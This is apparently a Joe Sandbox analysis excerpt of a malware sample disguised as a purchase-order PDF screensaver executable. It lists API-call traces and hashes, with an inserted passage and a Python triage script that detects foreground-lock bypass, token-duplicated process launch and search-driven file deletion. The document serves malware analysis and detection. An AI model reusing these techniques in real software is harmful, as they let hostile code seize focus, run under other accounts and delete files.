                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ProcWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 181713994-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wfsopen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 197181222-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                                                                                                            • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
APIs
• Sleep.KERNELBASE(000001F4), ref: 0553D2E1
Memory Dump Source
• Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
• DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
• GetKeyState.USER32(00000011), ref: 0047C1A4
• GetKeyState.USER32(00000009), ref: 0047C1AD
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
• GetKeyState.USER32(00000010), ref: 0047C1CA
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
• SendMessageW.USER32 ref: 0047C2FB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$State$LongProcWindow
• String ID: @GUI_DRAGID$F
• API String ID: 1562745308-4164748364
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID:
• String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
• API String ID: 0-3772701627
APIs
• GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
• IsIconic.USER32(?), ref: 004375E1
• ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
• SetForegroundWindow.USER32(?), ref: 004375FD
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
• GetCurrentThreadId.KERNEL32 ref: 00437619
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
• SetForegroundWindow.USER32(?), ref: 00437645
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
• keybd_event.USER32(00000012,00000000), ref: 0043765D
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                            • API String ID: 3778422247-2988720461
                                                                                                                                                                                                                                                                                                            • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
APIs
• _memset.LIBCMT ref: 0044621B
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
• GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
• SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
• _wcslen.LIBCMT ref: 0044639E
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• _wcsncpy.LIBCMT ref: 004463C7
• LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
• CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
• UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
• CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
• CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
• SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
• CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
• DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
• String ID: $default$winsta0
• API String ID: 2173856841-1027155976
• Opcode ID: 2af4fb292b3820614907b6fef5829bf2aa745f8d525175a90eec80f6cf43f0ef
• Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
• Opcode Fuzzy Hash: 2af4fb292b3820614907b6fef5829bf2aa745f8d525175a90eec80f6cf43f0ef
• Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
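The API listings above are recognisable behaviours rather than noise: the first function attaches its input queue to the target window's thread (AttachThreadInput with 00000001), injects Alt key events (keybd_event with virtual key 00000012, VK_MENU) around SetForegroundWindow, then detaches (AttachThreadInput with 00000000), which is the standard way to defeat the foreground-window lock; the second duplicates a token, opens winsta0\default and launches a child with CreateProcessAsUserW; the third enumerates files with FindFirstFileW and deletes matches with DeleteFileW. As an added example that is not part of the Joe Sandbox report, the Python below parses listing lines in this report's format and flags those three patterns per function. The rule names, the Function/Call structures and the sample listing are this example's own; the sample is constructed from lines shown on this page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One bullet line of a Joe Sandbox per-function API listing, e.g.
#   • keybd_event.USER32(00000012,00000000), ref: 0043765D
#   • GetCurrentThreadId.KERNEL32 ref: 00437619
#     • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

VK_MENU = 0x12  # virtual-key code of Alt


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: bool  # "Part of subcall function": made by a callee, not this function


@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)

    @property
    def label(self) -> str:
        """Address of the first direct call; used to name the function."""
        direct = [c.ref for c in self.calls if not c.subcall]
        return direct[0] if direct else self.calls[0].ref

    def has(self, api: str) -> bool:
        return any(c.api == api and not c.subcall for c in self.calls)

    def args_of(self, api: str) -> List[List[str]]:
        return [c.args for c in self.calls if c.api == api and not c.subcall]


def parse_listing(text: str) -> List[Function]:
    """Split a listing into functions; every "APIs" heading starts a new one."""
    functions: List[Function] = []
    current: Optional[Function] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = None
            continue
        m = API_LINE.match(line)
        if not m:
            continue  # metadata lines (Memory Dump Source, Similarity, ...) are skipped
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        call = Call(m["api"], m["module"], args, m["ref"].upper(), m["sub"] is not None)
        if current is None:
            current = Function()
            functions.append(current)
        current.calls.append(call)
    return functions


def _hex_arg(args: List[str], i: int) -> Optional[int]:
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):  # "?" means the sandbox could not resolve it
        return None


def rule_force_foreground(fn: Function) -> bool:
    """AttachThreadInput + synthetic Alt press + SetForegroundWindow: pulls a
    window to the front despite the foreground lock, without user interaction."""
    return (fn.has("AttachThreadInput") and fn.has("SetForegroundWindow")
            and any(_hex_arg(a, 0) == VK_MENU for a in fn.args_of("keybd_event")))


def rule_process_as_user(fn: Function) -> bool:
    """Duplicated token + winsta0 + CreateProcessAsUserW: starts a child under
    another security context on the interactive window station."""
    return (fn.has("DuplicateTokenEx") and fn.has("CreateProcessAsUserW")
            and any(a and a[0].lower() == "winsta0" for a in fn.args_of("OpenWindowStationW")))


def rule_enumerate_and_delete(fn: Function) -> bool:
    """FindFirstFileW together with DeleteFileW: deletion driven by a file search."""
    return fn.has("FindFirstFileW") and fn.has("DeleteFileW")


RULES = {
    "force_foreground": rule_force_foreground,
    "process_as_user": rule_process_as_user,
    "enumerate_and_delete": rule_enumerate_and_delete,
}


def triage(text: str) -> List[tuple]:
    """Return (function label, rule name) for every function matching a rule."""
    return [(fn.label, name)
            for fn in parse_listing(text)
            for name, rule in RULES.items() if rule(fn)]


# Constructed sample: three function blocks in this report's line format.
SAMPLE = """\
APIs
• ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
• SetForegroundWindow.USER32(?), ref: 004375FD
• GetCurrentThreadId.KERNEL32 ref: 00437619
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
• keybd_event.USER32(00000012,00000000), ref: 0043765D
• SetForegroundWindow.USER32(?), ref: 004376AD
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• _memset.LIBCMT ref: 0044621B
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
APIs
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
• lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
• DeleteFileW.KERNEL32(?), ref: 0044BED5
"""

if __name__ == "__main__":
    for label, rule in triage(SAMPLE):
        print(f"function @ {label}: {rule}")
```

Subcall lines are parsed but excluded from rule matching, since they describe a callee's behaviour and would otherwise let one shared helper (such as the _malloc wrapper at 0041171A) trigger a rule in every function that uses it. The keybd_event check reads the first argument as hex so that unresolved "?" arguments never match.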
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,004A8E80,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
  • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• _wcscat.LIBCMT ref: 0044BD96
• _wcscat.LIBCMT ref: 0044BDBF
• __wsplitpath.LIBCMT ref: 0044BDEC
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
• _wcscpy.LIBCMT ref: 0044BE73
• _wcscat.LIBCMT ref: 0044BE85
• _wcscat.LIBCMT ref: 0044BE97
• lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
• DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                                            • API String ID: 2188072990-1173974218
                                                                                                                                                                                                                                                                                                            • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                                                                                                                                                                                                            • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
• __swprintf.LIBCMT ref: 00434D91
• _wcslen.LIBCMT ref: 00434D9B
• _wcslen.LIBCMT ref: 00434DB0
• _wcslen.LIBCMT ref: 00434DC5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
• _memset.LIBCMT ref: 00434E27
• _wcslen.LIBCMT ref: 00434E3C
• _wcsncpy.LIBCMT ref: 00434E6F
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
• CloseHandle.KERNEL32(00000000), ref: 00434EB4
• RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
• CloseHandle.KERNEL32(00000000), ref: 00434ECE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 302090198-3457252023
• Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
